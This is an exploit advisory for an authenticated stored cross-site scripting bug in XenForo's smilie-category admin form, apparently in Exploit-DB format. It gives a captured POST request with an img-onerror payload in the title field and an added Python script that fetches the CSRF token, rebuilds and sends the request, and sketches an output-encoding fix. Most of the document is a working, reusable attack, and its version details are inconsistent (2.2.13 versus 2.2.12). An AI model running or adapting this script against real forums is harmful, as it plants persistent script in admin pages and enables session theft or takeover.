# Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS
# Date: 2023-06-24
# Exploit Author: Furkan Karaarslan
# Category: WebApps
# Vendor Homepage: https://x.com/admin.php?smilies
# Version: 2.2.12 (REQUIRED)
# Tested on: Windows/Linux
# CVE :
------------------------------------------------------------------------------------------------------------------------
Request

POST /admin.php?smilie-categories/0/save HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/admin.php?smilies/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422
Content-Length: 1038
Origin: http://127.0.0.1
Connection: close
Cookie: xf_csrf=aewkq90jbps2reci; xf_session=yclgxihboq9bsnkasymjpwyvtotiofa; xf_session_admin=wlr6uqjwxckpfjklngavh5t-4ygik5mq
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfToken"

1687616851,83fd2350307156281e51b17e20fe575b
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="title"

<img src=x onerror=alert(document.domain)>
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="display_order"

1
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfRequestUri"

/admin.php?smilies/
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfWithData"

1
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfToken"

1687616849,b74724a115448b864ba2db8f89f415f5
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfResponseType"

json
-----------------------------333176689514537912041638543422--

Response: once the smilie category is created, the payload stored in its title fires immediately (an alert box showing document.domain) when the smilies admin page renders.
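The capture above is a single browser request; to reproduce it repeatably, the script below rebuilds the same multipart body field by field (including the doubled _xfToken and the XHR markers the admin JavaScript sends), round-trips it through a small parser to confirm what the server will see, and shows the output-encoding step that would have neutralised the title. This is an added example, not the advisory author's code. It assumes you already hold an authenticated admin session (the bug is authenticated: note the xf_session_admin cookie) and that the admin page exposes the CSRF token as a data-csrf attribute or a hidden _xfToken input, which is how XenForo 2 templates normally emit it but should be verified against your target. Host, cookie values, token and the sample HTML are placeholders constructed for the example; Content-Length is computed from the body rather than copied from the capture, since the 1038 on the page depends on the author's exact boundary. The html.escape fix is illustrative of the bug class, not XenForo's actual patch.

```python
"""Rebuild the XenForo smilie-category stored-XSS request from the advisory.

Added example, not the advisory author's code. Assumes an existing admin
session and the XenForo 2 token markup described in the lead-in; all
host/cookie/token values are placeholders.
"""
import html
import re
import urllib.request

PAYLOAD = '<img src=x onerror=alert(document.domain)>'   # payload from the advisory
BOUNDARY = '---------------------------333176689514537912041638543422'
SAVE_PATH = '/admin.php?smilie-categories/0/save'        # "0" = create a new category

# Constructed stand-in for the admin.php?smilies/ page: only the token-bearing
# markup matters here; the real page is far larger.
SAMPLE_ADMIN_HTML = (
    '<html id="XF" data-app="admin" data-csrf="1687616851,83fd2350307156281e51b17e20fe575b">'
    '<body><form><input type="hidden" name="_xfToken" '
    'value="1687616851,83fd2350307156281e51b17e20fe575b"></form></body></html>'
)
SAMPLE_COOKIES = {  # placeholder session cookies, same names as in the capture
    'xf_csrf': 'aewkq90jbps2reci',
    'xf_session': 'yclgxihboq9bsnkasymjpwyvtotiofa',
    'xf_session_admin': 'wlr6uqjwxckpfjklngavh5t-4ygik5mq',
}


def extract_xf_token(page):
    """Pull the per-session CSRF token XenForo embeds in its pages (assumed markup)."""
    m = (re.search(r'data-csrf="([^"]+)"', page)
         or re.search(r'name="_xfToken" value="([^"]+)"', page))
    if not m:
        raise ValueError('no _xfToken found; are you logged in to the admin panel?')
    return m.group(1)


def build_multipart(fields, boundary=BOUNDARY):
    """Encode (name, value) pairs as multipart/form-data with CRLF line endings."""
    lines = []
    for name, value in fields:
        lines += [f'--{boundary}', f'Content-Disposition: form-data; name="{name}"', '', value]
    lines += [f'--{boundary}--', '']
    return '\r\n'.join(lines).encode()


def parse_multipart(body, boundary=BOUNDARY):
    """Inverse of build_multipart: the (name, value) pairs the server will receive."""
    pairs = []
    for chunk in body.split(f'--{boundary}'.encode())[1:]:
        if chunk.startswith(b'--'):          # closing delimiter
            break
        head, _, value = chunk.partition(b'\r\n\r\n')
        name = re.search(rb'name="([^"]*)"', head).group(1).decode()
        pairs.append((name, value[:-2].decode()))   # drop the CRLF before the next delimiter
    return pairs


def build_request(host, cookies, xf_token, title=PAYLOAD, display_order='1', scheme='http'):
    """Return (url, headers, body) mirroring the captured request."""
    fields = [
        ('_xfToken', xf_token),
        ('title', title),                  # the field that is stored and later rendered unescaped
        ('display_order', display_order),
        ('_xfRequestUri', '/admin.php?smilies/'),
        ('_xfWithData', '1'),
        ('_xfToken', xf_token),            # the browser sends the token twice; kept for fidelity
        ('_xfResponseType', 'json'),
    ]
    body = build_multipart(fields)
    headers = {
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'X-Requested-With': 'XMLHttpRequest',
        'Content-Type': f'multipart/form-data; boundary={BOUNDARY}',
        'Content-Length': str(len(body)),
        'Origin': f'{scheme}://{host}',
        'Referer': f'{scheme}://{host}/admin.php?smilies/',
        'Cookie': '; '.join(f'{k}={v}' for k, v in cookies.items()),
    }
    return f'{scheme}://{host}{SAVE_PATH}', headers, body


def send(url, headers, body, timeout=10):
    """Fire the request; only called from __main__ so the module imports offline."""
    req = urllib.request.Request(url, data=body, headers=headers, method='POST')
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read().decode(errors='replace')


def render_title_safely(title):
    """Illustrative fix for the bug class: HTML-encode the title on output so the
    stored <img> is shown as text instead of parsed as markup (not XenForo's patch)."""
    return html.escape(title, quote=True)


if __name__ == '__main__':
    token = extract_xf_token(SAMPLE_ADMIN_HTML)     # live target: GET /admin.php?smilies/ first
    url, headers, body = build_request('127.0.0.1', SAMPLE_COOKIES, token)
    print(url, headers['Content-Length'], dict(parse_multipart(body))['title'])
    # status, text = send(url, headers, body)       # uncomment only against a lab instance you own
```

Against a live lab instance, fetch /admin.php?smilies/ with the admin cookies, feed the response to extract_xf_token, then pass the result to build_request and send; a JSON response followed by an alert when /admin.php?smilies/ is reloaded confirms the stored payload, and the same page viewed after applying output encoding like render_title_safely should show the literal tag text instead.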